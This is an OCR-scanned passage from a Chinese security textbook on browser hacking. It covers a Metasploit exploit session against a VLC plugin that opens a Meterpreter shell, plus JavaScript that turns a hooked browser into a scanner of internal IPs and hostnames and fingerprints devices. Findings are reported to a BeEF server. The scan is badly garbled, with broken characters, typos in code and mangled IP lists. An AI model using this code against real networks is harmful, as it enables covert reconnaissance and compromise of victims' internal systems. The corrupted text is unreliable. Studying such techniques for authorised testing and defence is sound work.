Q ax "o [x] 图 (Ð p Search Sg Favorites «2a "um 


Address |) http://browserhacker.com:8080}vIc 












































图 8-22 ”利用 成 功 后 浏览 器 窗口 中 显示 的 内 容 


随后 , Meterpreter payload 会 自动 转移 到 新 进程 。 这 是 因为 利用 成 功 后 , 浏览 器 会 变 得 不 稳定 。 




















此 时 ， 切 换 到 新 进程 ， 可 以 保证 Meterpreter payload 运 行 的 时 间 能 够 更 长 一 些 。 此 时 的 Metasploit 
控制 台中 应 该 显示 类 似 以 下 输出 : 


[*] 192.168.1.16 vlc mms bof - Sending malicious page 
[*] Sending stage (752128 bytes) to 192.168.1.16 

[*] Meterpreter session 3 opened (192.168.1.132:8675 

-» 192.168.1.16:1095) at 2013-09-18 02:40:19 -0400 

[*] Session ID 3 (192.168.1.132:8675 -» 192.168.1.16:1095) 
processing InitialAutoRunScript 'migrate -f' 
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Current server process: iexplore.exe (2000) 
Spawning notepad.exe process to migrate to 
Migrating to 2308 

Successfully migrated to process 


msf exploit(vlc mms bof) » sessions -i 3 





[*] Starting interaction with 3... 

meterpreter » sysinfo 

Computer : VM-1 

OS : Windows XP (Build 2600, Service Pack 3). 
Architecture : x86 

System Language : en US 

Meterpreter : x86/win32 





Dae BEANS EAI, 因此 用 户 不 一 定 会 认为 恶意 页 面 就 是 骨 省 的 元 凶 。 同 样 的 攻击 也 
可 以 用 于 很 多 其 他 情景 中 , 包括 注入 到 广告 块 中 、 以 下 载 来 驱动 和 钓鱼 攻击 。 该 页 面 展示 给 用 户 
的 是 一 个 不 会 加 载 的 视频 播放 器 ， 而 后 台 则 是 非常 危险 的 东西 。 用 户 意识 到 哪里 不 对 的 时 候 , De 
击 者 就 已 经 获得 执行 shell 命 令 的 权限 。 你 遇 到 过 类 似 这 种 不 会 加 载 视频 的 页 面 吗 ? 





























8.4 小 结 


浏览 器 插件 旨 在 增加 浏览 器 功能 ,为 用 户 提 供 更 丰富 的 体验 。 无 论 是 查看 新 的 媒体 类 型 、 增 
强 应 用 功能 ,或 者 与 其 他 服务 通信 ， 持 件 都 为 Web 增 加 了 无 限 可 能 。 当 然 ， 与 此 同时 ， 可 被 攻击 
的 地 方 也 变 多 了 。 要 确定 浏览 器 安装 了 什么 插件 并 不 难 。 通 过 查询 DOM 或 加 载 ActiveX 插 件 , BeEF 
可 以 确定 加 载 了 什么 插件 ， 并 识别 有 漏洞 的 插件 。 

Java、Firefox 和 Chrome 实 现 的 Click to Play 安 全 特性 , 虽然 可 以 提高 安全 性 , 但 已 经 被 证 明 仍 
然 是 可 以 攻破 的 。 本 章 讨论 了 在 Java 和 Firefox 中 绕 过 点 击 播放 的 示例 , 但 那些 漏洞 已 经 被 修复 了 。 
不 过 ， 随 着 新 的 绕 行 技术 出 现 ， 机 会 仍然 存在 。 

本 章 还 用 较 大 篇 幅 讨论 了 Java、ActiveX 及 其 他 流行 的 媒体 插件 , 但 相关 的 利用 技术 对 其 他 插 
件 也 适用 。 或 许 你 会 在 终端 安全 评估 中 遇 到 一 个 不 那么 常见 的 插件 , 但 只 要 可 以 方便 地 取得 该 插 
件 ， 那 么 就 没什么 可 以 阻挡 你 去 分 析 它 的 漏洞 。 

攻击 插件 并 不 单纯 依赖 浏览 器 ,也 依赖 第 三 方 应 用 组 件 。 如 果 你 知道 受害 人 系统 中 安装 了 有 
漏洞 的 应 用 ， 也 可 通过 浏览 器 去 攻击 该 应 用 。 

执行 本 地 文件 等 利用 技术 , 可 以 与 其 他 复杂 一 些 的 攻击 手段 结合 使 用 , 以 获得 对 目标 系统 的 
较 高 访问 权限 。 另外 的 一 些 利 用 相对 简单 ， 只 要 一 个 URL 就 可 以 实现 。 插件 沙 箱 尝 试 解 决 这 个 问 
题 , 但 通过 使 用 签名 的 插件 、 社 会 工程 学 , 或 者 利用 已 有 的 信任 关系 ， 这样 的 限制 同样 有 可 能 
打破 以 实现 利用 。 

Chromium 团 队 发 表 的 一 份 声明 ”也 提 到 了 浏览 器 插件 。 考 虑 到 稳定 性 和 安全 性 ，Chrome 会 
在 2014 年 底 结 束 对 古老 的 Netscape Plugin API ( NPAPI ) 的 支持 。 加 上 Mozilla 要 求 Firefox 用 户 在 
运行 插件 前 先 接受 插件 ”， 看 起 来 插件 这 个 攻击 面 正 开 始 缩小 。 
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虽然 Chrome 和 Firefox 都 在 增加 对 使 用 插件 的 限制 , 但 插件 也 不 会 在 一 夜 之 间 消 失 。 此 外 , 由 
于 历史 原因 及 企业 级 需求 ， 微 软 不 大 可 能 放弃 对 ActiveX 插 件 的 支持 。 无 论 各 浏览 器 厂商 有 什么 
策略 ， 只 要 用 户 愿 意 点 击 Accept， 浏 览 如 插件 就 还 是 侵入 有 漏洞 的 系统 的 一 道 大 门 。 











8.5 问题 


(1) 插件 与 扩展 有 什么 不 同 ? 

(2) 在 IE 中 检测 插件 有 什么 有 效 的 方法 ? 

(3) 在 Firefox 中 检测 插件 有 什么 有 效 的 方法 ? 

(4) 浏览 器 如 何 决定 使 用 哪个 插件 ? 

(5) 什么 情况 下 签名 Java 小 程序 可 能 存在 漏洞 ? 

(6) 为 什么 应 用 程序 能 够 覆盖 签名 小 程序 的 权限 模型 ? 

(7) 未 签名 的 Java 小 程序 能 否 执 行 操作 系统 命令 ? 

(8) 识别 网 站 是 否 保 存 了 Flash 数 据 的 两 种 方法 是 什么 ? 

(9) 如 何 检测 是 否 可 以 通过 Flash 访 问 摄像 头 ? 

(10) 为 什么 本 地 文件 执行 漏洞 在 公司 环境 中 影响 很 大 ? 

要 查看 问题 的 答案 ， 请 访问 本 书 网 站 https://browserhacker.com/answers， 或 者 Wiley 的 网 站 
http://www.wiley.com/go/browserhackershandbook。 
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攻击 Web 应 用 








本 昔 探 讨 如 何在 不 违反 SOP 的 情况 下 ， 通 过 勾 连 浏览 絮 攻 击 Web 应 用 。 如 果 你 控制 了 一 个 浏 
览 们 ， 而 且 该 浏览 絮 可 以 访问 内 网 Web 应 用 ， 那 么 这 个 Web 应 用 就 会 成 为 一 个 可 能 的 目标 。 

先 想 一 想 整个 过 程 。 过 去 ， 一 般 都 认为 内 网 的 Web 应 用 不 必 像 互联 网 上 的 Web 应 用 那样 重视 
安全 。 有 既然 应 用 处 在 不 会 被 外 网 访问 到 的 内 网 里 ,何苦 还 要 考虑 安全 呢 ? 事实 上 ,本章 将 介绍 很 
多 技术 , 利用 它们 都 可 以 从 外 网 访问 到 内 网 中 的 目标 。 只 要 有 被 勾 连 的 浏览 器 ,就 可 以 通过 它 找 
到 内 网 中 薄弱 的 攻击 目标 。 

浏览 器 跨 域 请 求 资源 的 方法 有 很 多 种 。 而 本 章 也 有 几 节 介绍 利用 SQL 注入 和 XSS 漏 洞 实施 攻 
击 的 方法 。 本 章 最 后 几 节 更 进一步 ， 将 演示 如 何 定位 那些 暴露 了 远程 代码 执行 缺陷 的 Web 应 用 。 

本 章 ， 我 们 将 攻击 面 扩大 到 内 网 。 通 过 浏览 器 代理 实现 攻击 ， 又 为 攻击 者 打开 一 扇 大 门 ,让 
他 们 使 用 已 有 的 攻击 工具 就 可 以 达到 前 所 未 有 的 领域 , 或 者 轻松 访问 之 前 不 可 能 访问 的 新 资源 。 

本 章 介绍 的 方法 不 仅 可 以 扩大 攻击 面 , 还 可 以 让 攻击 者 隐藏 得 更 深 , 但 同时 拥有 更 大 权限 以 
访问 无 法 路 由 的 内 网 Web 应 用 。 闲 话 少 说 ， 马 上 开始 吧 ! 


9.1 发 送 跨 域 请 求 


发 送 跨 域 请 求 时 ， 多 数 情况 下 SOP 都 会 阻止 我 们 读 取 HTTP 响 应 。 本 章 以 及 接 下 来 儿童 会 介 
绍 ， 实 现 攻击 并 不 一 定 非 要 读 取 响 应 。 

如 果 你 知道 了 某 个 服务 器 存在 远程 命令 执行 或 SQL 注 和 漏洞， 就 可 以 发 送 包 含 攻击 的 请 求 ， 
忽略 响应 。 很 多 攻击 的 目的 在 于 让 攻击 目标 正确 地 处 理 HTTP 请 求 中 的 数据 。 


9.1.1 KBAR E 


在 发 动 跨 域 攻击 之 前 ,需要 知道 哪个 浏览 器 适合 生成 跨 域 请 求 。 这 样 才能 确保 你 发 起 的 攻击 
都 能 到 达 目 标 。 

提 到 跨 域 异常 , 并 非 所 有 浏览 器 都 一 样 。 版 本 和 厂商 不 同 , 利用 价值 也 不 同 。CSS JavaScript 
和 SOP 都 可 能 存在 一 些 不 同 寻常 的 地 方 ， 从 而 影响 攻击 的 成 败 。 本 小 节 介绍 如 何在 任意 时 间 点 确 
定 浏览 句 的 能 力 。 

要 事先 讲 。 首 先 来 看 一 看 你 自己 的 浏览 顺 能 和 否 发 送 跨 域 请 求 。 运 行 以 下 代码 , 测试 一 下 浏览 
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器 是 否 有 用 。 结 果 可 以 告诉 我 们 浏览 器 是 否 能 够 发 送 POST 或 GET 形 式 的 XMLHttpRequest 跨 域 
请 求 。 先 运行 如 下 Ruby 代 码 ， 准 备 好 在 服务 器 上 处理 POST 和 GET 请 求 : 


require 'rubygems' 
require 'thin' 
require 'rack' 
require 'sinatra' 


class XhrHandler « Sinatra::Base 
post "/" do 
puts "POST from [#{request.user_agent}]" 
params.each do |key,value| 
puts "POST body [#{key}->#{value}]" 
end 
p "[+] Content-Type [#{request.content_type}]" 
p "[+] Body [#{request.body.read}]" 
# p "Raw request: Mn #{request.env.to_s}" 


get "/" do 
puts "GET from [#{request.user_agent}]" 
params.each do |key,value| 
puts "[+] Request params [#{key} -> #{value}]" 
end 
end 


options "/" do 
puts "OPTIONS from [#{request.user_agent}]" 
puts "[+] The preflight was triggered" 

end 


end 


@routes = { 
"/xhr" => XhrHandler.new 


} 


Grack app = Rack: :URLMap.new(@routes) 
Gthin = Thin::Server.new("browserhacker.com", 4000, @rack_app) 


Thin::Logging.silent - true 
Thin::Logging.debug - false 


puts "[#{Time.now}] Thin ready" 

Gthin.start 

这 些 代码 依赖 一 些 常 见 的 Ruby 库 才能 运行 。 这 里 的 Ruby 后 端 使 用 了 Thin 作 为 Web 服 务 器 ， 
Sinatra 作 为 Rack 中 间 件 的 上 层 API。 只 实现 了 一 个 路 径 规则 ( @eroutes 变 量 )， 指 定 /xhr 路 径 由 
xhrHandler 类 人 处理。 这 个 类 中 的 方法 负责 处 理 GET、POST 和 OPTIONS 请 求 。 

接 下 来 需要 在 浏览 器 控制 台中 运行 如 下 JavaScript 脚 本 ， 该 脚本 会 尝试 和 监听 服务 器 通信 : 
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var uri = "http://browserhacker.com"; 
var port = 4000; 


xhr = new XMLHttpRequest (); 





xhr.open("GET", uri + ":" + port + "/xhr?param=value", true); 
xhr.send() ; 

xhr = new XMLHttpRequest (); 

xhr.open("POST", uri + ":" + port + "/xhr", true); 
xhr.setRequestHeader("Content-Type", "text/plain"); 
xhr.setRequestHeader('Accept','*/*'); 
xhr.setRequestHeader("Accept-Language", "en"); 

xhr.send("a001 LIST \r\n"); 


两 个 请 求 都 发 送 到 browserhacker.com:4000。 第 一 个 就 是 简单 的 异步 GET 请 求 , 第 二 个 是 一 个 
异步 POST 请 求 ， 但 设置 了 自 定义 的 内 容 类 型 Ltext /plain 和 一 个 自 定义 的 请 求 体 。 
在 Chrome 中 测试 之 后 ， 可 以 看 到 如 下 输出 : 


$ ruby XMLHttpRequest-test-server.rb 

[2013-07-07 20:05:42 +1000] Thin ready 

POST from [Mozilla/5.0 (Macintosh; Intel Mac OS X 10 8 4) AppleWebKit/53 
7.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36] 

"[+] Content-Type [text/plain]" 

"[+] Body [a001 LIST \r\n]" 

GET from [Mozilla/5.0 (Macintosh; Intel Mac OS X 10 8 4) AppleWebKit/537 
.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36] 

[+] Request params [param -> value] 


浏览 器 以 及 版 本 不 同 , 输出 的 内 容 也 可 能 有 差异 。 对 当前 浏览 器 而 言 , 通常 有 两 种 情形 可 能 
发 生 。 

这 里 要 讨论 的 跨 域 请 求 一 般 分 两 步 , 攻击 互联 网 目标 和 攻击 内 网 目标 ,对 攻击 内 网 目标 而 言 ， 
重要 的 是 要 知道 , 带 有 非 RFC1918 地 址 的 源 上 的 勾 连 浏览 器 , 可 以 从 带 有 RFC1918 地 址 的 (内 网 ) 
源 请 求 资源 。 修 改 前 面 例子 中 的 uri 和 绑 定 的 port 可 以 验证 这 一 点 。 比 如 在 Chrome 中 ， 图 9-1 展 
示 了 它 会 给 出 错误 消息 ， 揭 示 缺 少 CORS 首 部 。 这 没 错 ， 因 为 代码 中 确实 没有 提供 CORS 首 部 。 
但 无 论 浏 览 器 报 什么 错 ， 关 键 是 GET 和 POST 跨 域 请 求 都 已 经 成 功 到 达 了 目标 。 








Chrome 26: Network tab 


| xhr?param» value 
L browserhacker.com 


138  484ms 
08 
xhr 


| main. 138 483ms 
i browserhacker.com 


08 





Chrome 26: Console tab 


@ XMLHttpRequest cannot load http://browserhacker.com:4000/xhr. 
Origin http://192.168.0.2 is not allowed by Access-Control-Allow- 
Origin. XHR-x-domain.html:1 

@ XMLHttpRequest cannot load http://browserhacker.com:4000/xhr? 
param-value. Origin http://192.168.0.2 is not allowed by Access- 
Control-Allow-Origin. XHR-x-domain.html:1 

> 








Ruby server logs: the requests arrive correctly. 


POST from [Mozilla/5.0 O osh; Intel Mac OS X 10.8.3) AppleWiebKit/S37.31 (KHTML, like Gecko) Chrone/26.0.1410.65 Safari/S37.31] 
“[+] Content-Type [t 








Intel Mac OS X 10.8.3) ApplefebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31] 
J 





图 9-1 Chrome 在 遇 到 没有 CORS 首 部 的 跨 域 请 求 时 会 报错 
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9.1.2 WEAK 


前 置 请 求 (preflight request ) 是 在 主 CORS HTTP 请 求 之 前 发 送 的 HTTP 请 求 。 实 际 上 ， 这 两 
个 请 求 被 发 送 到 Web 服 务 器 会 取得 一 个 响应 体 。 

如 果 CORS 请 求 没有 使 用 简单 方法 -或 简单 首部 ， 就 会 发 送 前 置 请 求 。 前 置 请 求 使 用 OPTIONS 
方法 询问 服务 器 是 否 接 受 自 定义 首部 、 内 容 类 型 或 HTTP 动 词 。 如 果 服 务 器 返回 肯定 的 响应 ， 则 
响应 体 就 可 以 跨 域 访问 。 

前 面 的 JavaScript XMLHt tpRequest 代 码 故 意 使 用 了 text /plain 内 容 类 型 以 触发 更 复杂 的 
浏览 器 CORS 逻 辑 。 具 有 类 似 行为 的 内 容 类 型 还 有 application/x-www-form-urlencoded 和 


multipart/form-datao 





















































9.43 含义 


POSTIPS HM text /plain.application/x-www-form-urlencodedfilmultipart /form- 
data 内 容 类 型 ， 在 多 数 情况 下 都 不 会 发 送 前 置 请 求 。 向 自 定义 端口 发 送 自 定义 内 容 类 型 跨 域 请 求 
的 可 能 性 ， 正 是 实现 攻击 网 络 服务 的 关键 所 在 。 

第 10 章 会 介绍 的 内 部 协议 通信 与 利用 等 技术 , 本 质 上 也 依赖 于 与 那些 端口 和 自 定 义 类 型 通信 
的 能 力 。 攻 击 网 络 服务 只 是 利用 这 种 行为 的 其 中 一 种 方法 。 本 章 最 后 还 会 讨论 JBoss 、GlassFish 
和 mo0n0wall 中 的 跨 域 利用 。 所 有 这 些 技术 都 依赖 于 被 匀 连 的 浏览 器 , 使 用 某 种 不 要 求 前 置 请 求 的 
内 容 类 型 来 发 送 跨 域 请 求 。 


9.2 i556 Web 应 用 检测 


要 发 现 跨 域 Web 应 用 ， 可 以 利用 上 一 介 绍 的 技术 。 本 节 ， 我 们 以 内 艇 框架 作为 检测 手段 ， 
还 会 介绍 发 现 内 部 设备 耻 地 址 和 内 部 域名 的 方法 。 这 两 类 方法 都 有 赖 于 在 隐藏 的 内 内 框 架 中 加 载 
选 定 端口 的 一 个 下 或 域名 。 


9.2.1 ”发现 内 网 设备 IP 地 址 


勾 连 对 子 网 有 访问 权限 的 浏览 器 , 可 以 发 现 内 网 设备 。 这 个 子 网 不 一 定 可 以 通过 互联 网 路 由 。 
关键 是 要 勾 连 到 一 个 浏览 器 ， 而 该 浏览 器 有 权 访问 子 网 。 

利用 浏览 器 可 以 在 内 髓 框架 中 加 载 跨 域内 容 的 能 力 ,可 以 检测 Web 应 用 是 否 运行 在 目标 来 源 
Eo 假设 要 检测 172.16.37.0/24 这 个 子 网 中 运行 在 80 端 口 的 Web 应 用 ， 那 可 以 使 用 如 下 代码 : 










































































var protocol = "http://"; 
var port = 80; 
var c_subnet = "172.16.37.0"; 


// 以 下 代码 返回 172.16.37 
var c = c_subnet.split ( 
c_subnet.split('.') [3] 


9.20 383% Web 应 用 检测 331 





) [0]; 


// 添加 新 的 'b' 元 素 ， 盛 放 后 来 添加 的 IFrame 
var dom = document.createElement('b'); 
document .body.appendChild(dom) ; 


// 加 载 ITFrame，IFrame 指 向 选 代 的 IP 

function check host(url, id) { 

var iframe - document.createElement('iframe'); 
iframe.src - url; 


iframe.id = "i " + id; 

iframe.style.visibility - "hidden"; 
iframe.style.display - "none"; 

iframe.style.width = "0px"; 

iframe.style.height = "0px"; 

iframe.onload = function() { 

console.log('Internal webapp found: ' + this.src); 


j 
dom.appendChild(iframe); 
j 


// 通过 类 C 的 子 网 选 代 

for(var i=1; i < 255; i++) { 

var host = c + i; 

check_host (protocol + host + ":" + port, i); 


} 


// 如 果 IFrame 的 src 不 存在 ， 则 不 会 触发 onerror 事 件 ， 因 此 需要 清理 DOM 
setTimeout (function() { 

for(var i=l; i < 255; i++){ 

var del = document.getElementById("i_" + i); 
dom.removeChild(del); 

j 

), 2000); 


XT 80B2172.16.37.0/24,. Bi rf B A XEINPUB 2544 HIP, 2 BE IPSI A ESL] VS] HR 
框架 。 每 个 框架 都 会 加 载 当 前 迭代 的 全， 使 用 http:// 协 议和 端口 20。 比 如 ， 其 中 一 次 迭代 加 载 的 
是 http:/172.16.37.147:80。 

如 果 内 艇 框架 加 载 成 功 , 就 会 触发 onloaq 事 件 , 也 就 是 172.16.37.147:80 上 的 设备 在 运行 Web 
服务 器 , 因而 很 可 能 该 设备 上 部 署 了 Web 应 用 。 在 本 地 子 网 中 加 载 并 运行 以 上 代码 的 时 间 非 常 短 ， 
通常 少 于 两 秒 。 两 秒 之 后 ， 把 所 有 之 前 添加 的 内 骨 框 架 从 DOM 中 清除 掉 。 


9.2.2 MAA arias 


枚 举 内 部 域名 是 检测 跨 域 Web 应 用 的 男 一 个 方法 ， 与 发 现 内 部 IP 地 址 很 相似 。 区 别 主要 在 于 
迭代 的 是 预定 义 的 域名 而 非 IP。 

下 面 代码 中 的 数组 包含 一 些 常 用 的 内 部 域名 。 在 JavaScript 控 制 台中 运行 这 段 代码 , 就 可 以 发 
现 使 用 了 其 中 一 个 内 部 域名 的 Web 应 用 : 
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GD 
var port = 80; 


// 一 般 的 内 部 主机 名 

var hostnames = new Array ("about", "accounts", "admin", 
"administrator", "ads", "adserver", "adsl", "agent", 
"blog", "channel", "client", "dev", "devil", "dev2", 

"dev3", "dev4", "dev5", "dmz", "dns", "dnsO", "dns", 
"dns2", "dns3", "extern", "extranet", "file", "forum", 
"forums"; "ftp", "fttpserver", "host", "http", "https"; 
"ida", "ids", "imail", "imap", "imap3", "imap4", "install", 
"intern", "internal", "intranet", "irc", "linux", "log", 
"mail", "map", "member", "members", "name", "nc", "ns", 
"ntp", "ntserver", "office", "owa", "phone", "pop", "pppl", 
Dpto A "print", "printer", "project",  '"pub",. "public", 
"preprod", "root", "route", "router", "server", "smtp", 
"sql", "sqlserver", "ssh", "telnet", "time", "voip", 

"w", "webaccess", "webadmin", "webmail", "webserver", 
"website" " "win" " "windows bs " "ww" " "www" " "Wwwww " " "xml" ) ? 


// 添加 新 的 'b ' 元 素 ， 将 保有 附加 的 IFrame 
var dom = document.createElement('b'); 
document .body.appendChild(dom) ; 


// 加 载 隐 藏 的 IFErame, 指向 当前 选 代 的 主机 名 

function check host (url, id) { 

var iframe = document.createElement('iframe'); 
iframe.src = url; 


iframe.id = "i_" + id; 

iframe.style.visibility = "hidden"; 
iframe.style.display = "none"; 
iframe.style.width = "0px"; 

iframe.style.height = "0px"; 

iframe.onload = function() { 
console.log('Internal DNS found: ' + this.src); 


document.body.removeChild(this); 
Hs 
dom.appendChild(iframe); 
} 


// 通过 主机 名 数组 和 迭代 
for(var i=1; i < hostnames.length; i++) { 
check_host (protocol + hostnames[i] + ":" + port, i); 


// 如 果 IFrame 的 src 不 存在 ， 则 不 会 触发 onerror 事 件 ， 因 此 需要 清理 DOM 
setTimeout (function() { 

for(var i-1; i < 255; i++) { 

var del = document.getElementById("i " + i); 
dom.removeChild(del); 

j 

}, 2000); 


fDeEREAT SUA, EERISDOM'rPHdRÉ AFA AAEM TIA— PE, UR A HES EY 
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onload 事 件 被 触发 ， 就 说 明 发 现 了 内 部 域名 。 

前 面 两 段 代 码 经 过 修改 ， 都 可 以 支持 其 他 URI 协 议 ， 比 如 https:/ (不 过 https:/ 通 常 在 内 网 中 
更 管见 一 些 )， 以 及 支持 其 他 端口 ， 比 如 443 、8080 或 8443 。 

图 9-2 展 示 了 执行 前 面 两 种 方法 的 结果 。 在 172.16.37.1 和 172.16.37.147 这 两 个 IP 上 发 现 了 两 个 
内 部 Web 应 用 ， 还 发 现 了 www 和 sqlserver 两 个 内 部 域名 。 





we’ << > |7 || Console ~ HTML css Script DOM Net Cookies 


=a - = ^; — ui wo Motes ope, 
i$ . Clear Persist Profile All Errors . Warning "c. subnet -split('.')[3] 
91; 


>>> var protocol = "http://"; var port = 80; pue 
. : / dds a new b element that will hold 
var hos...Id("i." + i); Nar : 
o Mie // the appended IFrames 

dom. removeChild(del); } h 2000); var dom = document.createElement('b'); 
document .body . appendChild(dom); 

21 

Internal DNS found: http://sqlserver/ // load an hidden IPrame pointing to 
// the current IP being iterated 


Internal DNS found: http://www/ function check host(url, id){ 

var iframe = document.createElement('iframe'); 
>>> var protocol = "http://"; var port = 80; iframe.src = url; 
var c_s..."i_" + i); dom.removeChild(del); } iframe.id = "i " 


}, 2000); iframe. onload = function(( 
1338 console.log('Internal webapp found: ' * this.src); 


) 
Internal webapp found: http://172.16.37.1/ dom.appendChild(iframe); 
Internal webapp found: http://172.16.37.147/ 


// iterate through the class C subnet 
for(var i20; i < 255; i**)( 

var host = c + i; 

check_host(protocol + host + ":" + port, i); 
} 


// if the iframe src doesn't exists, the onerror method 


li de ne thrmm en ma nand ke nlaen + ferm nde 


Run Clear Copy History 





图 9-2 ”发 现 内 网 设备 及 域名 


发 现 了 勾 连 浏览 右 所 在 内 网 中 Web 应 用 对 应 的 他 和 域名 后 ， 下 一 步 就 是 采集 它们 的 指纹 。 
下 面 介 绍 一 些 帮 你 在 内 网 中 找到 潜在 目标 的 方法 。 更 多 高 级 的 方法 将 在 第 10 章 介绍 ， 比如 使 


用 Java 和 Session Discovery Protocol 等 。 


9.3 Sih Web 应 用 指纹 采集 


ed eh 并 可 以 为 其 绑 定 onload 和 onerror 自 定义 处 理 程序 。 
第 3 章 曾 详细 介绍 过 这 个 概念 。 本 章 也 会 利用 这 种 技术 来 识别 web 应用、 网 络 守 护 程序 ， 以 及 可 
Du BELT 其 他 设备 。 

可 以 通过 互联 网 访问 的 HTTP 服 务 ， 不 需要 使 用 这 里 讨论 的 指纹 采集 方法 ， 因 为 有 很 多 现成 
的 工具 可 以 让 你 直接 那么 做 。 本 章 讨论 的 Web 应 用 可 能 只 对 内 网 开放 。 此 时 ， 必 须 通过 义 连 浏览 
右 ， 然 后 间接 地 访问 目标 Web 应 用 。 因 此 ， 下 面 介 绍 的 方法 就 可 以 派 上 用 场 了 。 
































请 求 已 知 资源 
可 以 通过 枚 举 Web 应 用 中 常见 的 资源 定位 到 它 。 前 提 是 必须 知道 相应 Web 应 用 与 资源 的 映射 
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关系 。 然 后 就 可 以 通过 成 功 的 (或 不 成 功 的 ) 跨 域 请 求 推 断 出 目标 。 

这 里 所 说 的 资源 可 能 是 图 片 ,其 至 是 管理 界面 中 使 用 的 网 页 。 假设 你 想 找 的 是 Linksys NAS, 
那么 可 以 在 80 端 口上 寻找 资源 /Admin_top.jjpg。 这 张 图 片 是 该 设备 所 有 型 号 都 会 暴露 的 一 个 默认 
资源 。 

再 比如 ， 要 识别 Apache Web 服 务 器 ， 可 以 测试 /icon/apache_pb.gif 资 源 。 通常 在 产品 环境 中 都 
有 它 。 除 了 图 片 ， 这 种 技术 还 可 以 应 用 于 网 页 。 你 可 以 想到 的 所 有 Web 应 用 ， 像 CMS 、CRM、 
ERP， 无 论 安装 在 哪里 ， 都 可 能 有 一 些 默认 的 页 面 。 

无 论 如 何 , 这 种 技术 的 前 提 是 有 一 个 大 型 的 已 知 资源 的 数据 库 。 一 般 来 说 , 资源 数据 量 越 大 ， 
结果 就 越 可 靠 。 

1. 请 求 图 片 

我 们 先 来 看 看 在 目标 设备 上 找到 图 片 资源 的 指纹 采集 方法 。 首 先 ,就 是 要 有 需要 检测 的 一 组 
目标 IP， 比 如 : 



























































92..168,;0.1T"'; 
92.168.0.100' 
92.168.0.254' 
92.168.1.1", 
92.168.1.100' 
92.168.1.254' 
0.0.0. T"; 
10.151.134 
'192.168.2.1' 


192.168.2.254*, 
"L92.:T68.T100:5I*; 
'192.168.100.254', 
"T92: 7168123. 0^; 
"192.168..1234.254", 
'192.168.10.1', 

"192::168; 10:254 ' 
1; 
这 个 例子 中 给 出 的 都 是 局 域 网 中 的 私有 IP。 虽 然 不 一 定局 限于 内 部 网 络 , 但 攻击 内 部 网 络 经 
BA DA TUR o 

下 一 步 是 创建 一 个 指纹 采集 数据 库 ， 把 设备 或 Web 应 用 映射 到 图 片 。 为 了 保证 可 靠 性 和 减少 

误 报 ， 最 好 在 图 片 路 径 后 面 再 给 出 图 片 的 宽度 和 高 度 。 虽 然 可 能 有 两 个 Web 应 用 都 有 /logo.gif 图 
片 ， 但 这 两 张 图 片 大 小 完全 相同 的 可 能 性 却 很 小 。 指 纹 采集 数据 库 类 似 这 样 : 


Var fingerprint_data = new Array ( 









































new Array ( 
"JBoss Application server", 
"8080", "http",true, 
"/images/logo.gif",226,105), 
new Array ( 
"VMware ESXi Server", 
"80","http",false, 
"/background.jpeg",1,1100), 
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new Array ( 
"Glassfish Server", 
"4848","http",false, 
"/theme/com/sun/webui/jsf/suntheme \ 
/images/login/gradlogsides.jpg", 1, 200), 
new Array ( 
"mOnOwall", 
"80","http",false, 
"/logo.gif",150,47) 
):; 


这 个 fingerprint_data 数 据 结构 中 的 每 个 数组 元 素 ， 都 包含 域名 、 端 口 和 协议 类 型 ， 可 用 于 请 
求 图 片 路 径 ， 最 后 是 图 片 的 宽度 和 高 度 值 。 如 果 你 想 知 道 更 完整 的 (但 并 不 是 最 完整 的 ) 指纹 采 
集 数 据 库 ， 可 以 看 看 BeEF 的 internal network fingerprinter 模 块 ， 这 里 顺便 感谢 Brendan Coles 为 此 
付出 的 心血 *。 

有 了 PP， 也 有 了 图 片 ， 就 可 以 把 下 面 的 JavaScript 代 码 注入 匀 连 浏览 器 的 DOM 了 。 这 段 代 码 会 
检查 上 面 的 卫 〈 或 者 你 指定 的 其 他 耻 ) 是 否 在 运行 具有 fingerprint_data 中 某 个 特征 的 Web 应 用 : 


var dom = document.createElement('b'); 
// 每 个 IP 
for(var i=0; i < ips.length; i++) ( 
// 数据 集中 的 每 个 应 用 
for(var u=0; u < fingerprint_data.length; u++) { 
var img = new Image; 
img.id = u; 
img.src = fingerprint data[u][2]-«"://"-«ips[i] 
+":"4fingerprint_data[u] [1]+ fingerprint data[u][4]; 















































// 触发 onload 事 件 ， 找 到 图 片 


img.onload = function() { 


// 再 次 检查 宽度 和 高 度 


if (this.width == fingerprint_data[this.id][5] && 

this.height == fingerprint_data[this.id][6]) { 
console.log("Detecting [" + fingerprint_data[this.id] [0] 
+ "] at IP [" + ips[i] + "]"); 


// 通知 BeEF 服 务 器 
beef.net.send('<%= @command_url %>', <%= @command_id %>, 
'discovered='+escape(fingerprint_data[this.id][0])+ 
"Surl="+escape(this.src) 
y 
// 完工 ， 从 DOM 中 删除 图 片 
dom.removeChild(this) ; 
j 
j 
// 将 图 片 添加 到 DOM 
dom.appendChild(img); 
1) 


前 面 的 代码 运行 后 , SANKA MRSS A PLI CESAR s 资源 的 URL 由 fingerprint_data 
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和 ips 中 的 数据 组 合 而 成 。 如 果 图 片 的 onload 事 件 被 触发 ， 则 说 明 已 经 正确 定位 到 资源 ( 否则 会 
触发 onerror 事 件 Jo 

最 后 ,为 增加 确定 性 ,还 要 验证 图 片 的 宽度 和 高 度 。 如 果 图 片 的 路 径 、 宽 度 和 高 度 与 前 面 创 
建 的 数据 集中 的 某 一 个 条 目 对 应 ， 那 么 恭喜 你 ! 图 9-3 展 示 了 成 功 找到 一 个 资源 的 结果 。 














GET logo.gif 404 Not Found 10.90.68, 10 10.90.68, 10:443 
GET hp_invent_logo.gif 404 Not Found 10.90.68. 10 10.90.68. 10:443 
由 GET logo.gif 404 Not Found 10.90.68. 10 10.90.68. 10:443 
由 GET Xlogo Layer-1.gif 404 Not Found 10.90.68. 10 10.90.68. 10:443 
由 GET powered by.gif 404 Not Found 10.90.68. 10 10.90.68. 10:443 
© https://10.90.68.10/background.jpeg 200 OK 10.90.68. 10 10.90.68. 10:443 


Headers Respons 





Response Headers 


Connection Kee 
Content-Length 544 
Content-Type imac 1x1100 


Date Mon mse 15:17 GMT 


Request Headers 


Accept text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Encoding gzip, deflate 
Accept-Language en-US,en;q-0.5 
Connection keep-alive 
Host 10.90.68.10 
Referer nttp://172.16.37.1:3000/demos/basic.html 
User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0 





